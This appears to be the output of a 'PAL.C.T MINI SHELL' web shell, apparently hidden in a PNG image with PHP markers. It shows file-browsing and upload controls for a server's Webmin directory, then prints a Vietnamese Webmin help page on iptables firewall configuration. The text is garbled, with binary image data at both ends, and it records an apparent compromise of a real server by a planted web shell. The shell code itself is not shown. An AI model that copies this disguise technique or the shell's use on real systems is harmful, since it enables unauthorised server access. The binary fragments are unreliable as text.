php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall/help/
upload
files >> //usr/libexec/webmin/firewall/help/intro.vi.auto.html

<header> Tường lửa Linux </header><h3> Giới thiệu mô-đun </h3> Mô-đun này cho phép bạn định cấu hình các tính năng tường lửa IPtables được tìm thấy trong chuỗi 2.4 nhân Linux. Không giống như một số chương trình cấu hình tường lửa khác, thay vì tạo tập lệnh shell thiết lập tường lửa, nó đọc và chỉnh sửa tệp lưu ở định dạng được đọc và ghi bởi <tt>ipi (6) bảng - khôi phục</tt> và <tt>ipi (6) bảng - lưu</tt> tương ứng. <p> Nếu bạn đã có tường lửa trên hệ thống đã được thiết lập thủ công hoặc từ tệp tập lệnh, mô-đun sẽ đề nghị chuyển đổi nó thành tệp lưu IPtables cho bạn và tạo tập lệnh để chạy khi khởi động để kích hoạt quy tắc trong tập tin. Tuy nhiên, nếu bạn làm điều này thì bạn không còn nên chỉnh sửa tập lệnh quy tắc tường lửa của mình và cũng nên vô hiệu hóa nó để chạy khi khởi động. <p><h3> Tổng quan về IPtables </h3> Mỗi gói mạng đi vào, đi ra hoặc được chuyển tiếp bởi hệ thống của bạn được kiểm tra đối với một hoặc nhiều chuỗi để xác định điều gì sẽ xảy ra với nó. Mỗi chuỗi chứa 0 hoặc nhiều quy tắc, mỗi quy tắc có một điều kiện (để xác định gói nào phù hợp) và một hành động (để kiểm soát những gì xảy ra với các gói phù hợp). Mỗi chuỗi cũng có một hành động mặc định kiểm soát những gì xảy ra với các gói không khớp với bất kỳ quy tắc nào. <p> Mỗi chuỗi là một phần của bảng, trong đó hiện có ba: <ul><li> <b>Lọc gói ( <tt>bộ lọc</tt> )</b> <br> Các chuỗi trong bảng này có thể được sử dụng để kiểm soát dữ liệu đi vào hệ thống của bạn từ các máy chủ khác trên mạng, dữ liệu được gửi từ hệ thống của bạn bởi người dùng và các quy trình và dữ liệu được chuyển tiếp bởi hệ thống của bạn nếu nó hoạt động như một bộ định tuyến. <p><li> <b>Dịch địa chỉ mạng ( <tt>nat</tt> )</b> <br> Bảng này có thể được sử dụng để thiết lập NAT hoặc giả mạo, rất hữu ích nếu bạn muốn cung cấp cho toàn bộ mạng máy truy cập internet thông qua chỉ một địa chỉ IP thực. <p><li> <b>Thay đổi gói ( <tt>mangle</tt> )</b> <br> Bảng này là để sửa đổi các gói được chuyển tiếp bởi hoặc gửi ra từ hệ thống của bạn. <p></ul> Ngoài các chuỗi tiêu chuẩn là một phần của mỗi bảng, bạn cũng có thể tạo các chuỗi của riêng mình có thể được điều hành bởi các quy tắc trong chuỗi tích hợp. Điều này có thể hữu ích để nhóm và chia sẻ quy tắc có thể được sử dụng ở nhiều nơi. <p><h3> Trang chính </h3> Trang chính của mô-đun này liệt kê tất cả các chuỗi và quy tắc từ một trong các bảng có sẵn, được chọn từ danh sách ở phía trên bên trái. Dưới đây là một phần cho mỗi chuỗi trong bảng hiện tại, với tất cả các quy tắc trong mỗi chuỗi được liệt kê và các điều kiện của chúng được mô tả theo khả năng tốt nhất của mô-đun. Đối với mỗi chuỗi, bạn có thể thay đổi hành động mặc định bằng cách sử dụng danh sách thả xuống nếu chuỗi là một trong những chuỗi tích hợp cho bảng hoặc xóa nó bằng nút Xóa chuỗi nếu do người dùng xác định. <p> Bạn có thể nhấp vào bất kỳ quy tắc nào trong chuỗi để chỉnh sửa nó, nhấp vào mũi tên ở bên phải của mỗi hàng để di chuyển lên hoặc xuống hoặc nhấp vào nút Thêm quy tắc để thêm quy tắc mới. Thêm hoặc chỉnh sửa quy tắc sẽ đưa bạn đến một trang nơi bạn có thể chọn hành động cho từng quy tắc và các điều kiện để thực hiện hành động. <p> Ở dưới cùng của trang là một nút để kích hoạt cấu hình tường lửa hiện tại, bằng cách tải nó vào kernel bằng lệnh <tt>khôi phục bảng ipi (6)</tt> . Bên dưới nó là một nút để thực hiện ngược lại - lấy cấu hình hiện có trong kernel và làm cho nó có sẵn để chỉnh sửa. Cuối cùng, nếu bản phân phối của bạn hỗ trợ nó, có một nút để thay đổi xem tường lửa có được kích hoạt khi khởi động hay không. <p><h3> Chuỗi lọc </h3> Để cộng tác tốt hơn với các tập lệnh iptables bên ngoài, bạn có thể loại trừ các chuỗi riêng lẻ khỏi quá trình xử lý của tường lửa. Để làm điều này, bạn phải chọn xử lý trực tiếp các quy tắc trong cài đặt và nhập danh sách bộ lọc, loại trừ các chuỗi thích hợp khỏi quá trình xử lý. Các chuỗi không ngoại lệ khi chỉnh sửa được gắn cờ với thông báo &quot;không được quản lý bởi tường lửa&quot;. <p><h3> Bộ IP </h3> Các phiên bản mới hơn của bảng ip (6) hỗ trợ phần mở rộng ipset. Các bộ IP là danh sách các địa chỉ IP trong bộ nhớ chính, có thể được tìm kiếm rất hiệu quả và được sử dụng như một điều kiện trong các quy tắc. Trên trang chính, các bộ IP hiện có có thể được sử dụng theo quy tắc được hiển thị. Hiện tại, tuy nhiên, không thể quản lý những thứ này trong tường lửa. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`